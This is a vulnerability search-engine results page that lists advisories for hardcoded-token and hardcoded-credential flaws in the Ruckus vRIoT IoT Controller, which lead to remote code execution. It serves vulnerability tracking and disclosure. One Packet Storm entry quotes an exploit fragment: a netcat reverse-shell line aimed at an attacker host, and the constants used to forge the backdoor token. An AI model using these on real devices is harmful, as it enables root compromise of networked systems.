CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

24 matches found

Ruckus vRioT IoT Controller - Authentication Bypass

Ruckus vRioT through 1.5.1.0.21 contains an API backdoor caused by a hardcoded token in validatetoken.py,letting unauthenticated attackers interact with the API without authentication. id: CVE-2020-26879 info: name: Ruckus vRioT IoT Controller - Authentication Bypass author: DhiyaneshDk severity:...

10CVSS7.3AI score0.88897EPSS

Exploits1References6

RedhatCVE•added 2026/01/13 10:52 p.m.•4 views

CVE-2025-69425

The Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0 GA expose a command execution service on TCP port 2004 running with root privileges. Authentication to this service relies on a hardcoded Time-based One-Time Password TOTP secret and an embedded static token. An attacker who...

10CVSS8.1AI score0.00048EPSS

Exploits0References1

NVD•added 2026/01/09 5:15 p.m.•3 views

CVE-2025-69426

The Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0 GA contain hardcoded credentials for an operating system user account within an initialization script. The SSH service is network-accessible without IP-based restrictions. Although the configuration disables SCP and pseudo-TTY...

10CVSS0.00023EPSS

Exploits0References2

NVD•added 2026/01/09 5:15 p.m.•2 views

CVE-2025-69425

10CVSS0.00048EPSS

Exploits0References2

Vulnrichment•added 2026/01/09 4:15 p.m.•3 views

CVE-2025-69426 Ruckus vRIoT IoT Controller < 3.0.0.0 Hardcoded SSH Credentials RCE

10CVSS7AI score0.00023EPSS

Exploits0References2

CVE•added 2026/01/09 4:15 p.m.•6 views

CVE-2025-69426

The CVE-2025-69426 issue affects Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0. An initialization script contains hardcoded OS user credentials, enabling authentication even though SCP and pseudo-TTY are disabled. The SSH service is network-accessible without IP-based restriction...

10CVSS7AI score0.00023EPSS

Exploits0References2

Cvelist•added 2026/01/09 4:15 p.m.•19 views

CVE-2025-69426 Ruckus vRIoT IoT Controller < 3.0.0.0 Hardcoded SSH Credentials RCE

10CVSS0.00023EPSS

Exploits0References2

Vulnrichment•added 2026/01/09 4:14 p.m.•11 views

CVE-2025-69425 Ruckus vRIoT IoT Controller < 3.0.0.0 Hardcoded Tokens RCE

10CVSS7.7AI score0.00048EPSS

Exploits0References2

Cvelist•added 2026/01/09 4:14 p.m.•17 views

CVE-2025-69425 Ruckus vRIoT IoT Controller < 3.0.0.0 Hardcoded Tokens RCE

10CVSS0.00048EPSS

Exploits0References2

CNNVD•added 2026/01/09 12:0 a.m.•0 views

Ruckus vRIoT IoT Controller 信任管理问题漏洞

Ruckus vRIoT IoT Controller is a virtual wireless IoT controller from Ruckus USA. A trust management issue vulnerability exists in Ruckus vRIoT IoT Controller versions prior to 3.0.0.0 that stems from hard-coded credentials and could lead to the execution of arbitrary code...

10CVSS6.9AI score0.00048EPSS

Exploits0References2

Positive Technologies•added 2026/01/09 12:0 a.m.•1 views

PT-2026-1952

Name of the Vulnerable Software and Affected Versions Ruckus vRIoT IoT Controller versions prior to 3.0.0.0 GA Description The Ruckus vRIoT IoT Controller firmware exposes a command execution service on TCP port 2004 running with root privileges. Authentication to this service relies on a hardcod...

10CVSS7.8AI score0.00048EPSS

Exploits0References6

CNNVD•added 2026/01/09 12:0 a.m.•2 views

Ruckus vRIoT IoT Controller 信任管理问题漏洞

10CVSS6.9AI score0.00023EPSS

Exploits0References2

Positive Technologies•added 2026/01/09 12:0 a.m.•4 views

PT-2026-1953

Name of the Vulnerable Software and Affected Versions Ruckus vRIoT IoT Controller versions prior to 3.0.0.0 Description The Ruckus vRIoT IoT Controller firmware contains hardcoded credentials for an operating system user account within an initialization script. The SSH service is network-accessib...

10CVSS7.1AI score0.00023EPSS

Exploits0References6

VulnCheck KEV•added 2022/06/28 12:0 a.m.•0 views

VulnCheck KEV: CVE-2020-26879

Ruckus vRioT through 1.5.1.0.21 has an API backdoor that is hardcoded into validatetoken.py. An unauthenticated attacker can interact with the service API by using a backdoor value as the Authorization header...

10CVSS7.3AI score0.88897EPSS

Exploits1References1

KoreLogic Security•added 2021/05/26 12:0 a.m.•26 views

CommScope Ruckus IoT Controller Hard-coded API Keys Exposed

Vulnerability Details Affected Vendor: CommScope Affected Product: Ruckus IoT Controller Affected Version: 1.7.1.0 and earlier Platform: Linux CWE Classification: CWE-798: Use of Hard-coded Credentials CVE ID: CVE-2021-33220 2. Vulnerability Description API keys for CommScope Ruckus are included...

7.8CVSS0.4AI score0.00047EPSS

Exploits2Affected Software1

Packet Storm•added 2020/11/27 12:0 a.m.•602 views

Ruckus IoT Controller 1.5.1.0.21 Remote Code Execution

Product: Ruckus IoT Controller Ruckus vRIoT Version: &1|nc "+lhost+" "+lport+" /tmp/f; " return payload def generateMagicToken: encdecmethod = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode"utf8" strkey = 'serviceN1authent' strtoenc = 'TlBMVVMx' return encryptencdecmethod, salt, strkey,...

9CVSS0.1AI score0.62973EPSS

Exploits3

Exploit DB•added 2020/11/27 12:0 a.m.•847 views

Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution

9CVSS7AI score0.62973EPSS

Exploits3

CNVD•added 2020/10/27 12:0 a.m.•1 views

Ruckus Networks Ruckus vRioT Trust Management Issues Vulnerability

Ruckus Networks Ruckus vRioT is a software based on Bluetooth, ZigBee, LoRa to realize endpoint connectivity from Ruckus Networks, USA. A trust management issue vulnerability exists in Ruckus Networks Ruckus vRioT versions prior to 1.5.1.0.21. The vulnerability stems from the fact that Ruckus vRi...

10CVSS7AI score0.88897EPSS

Exploits1References1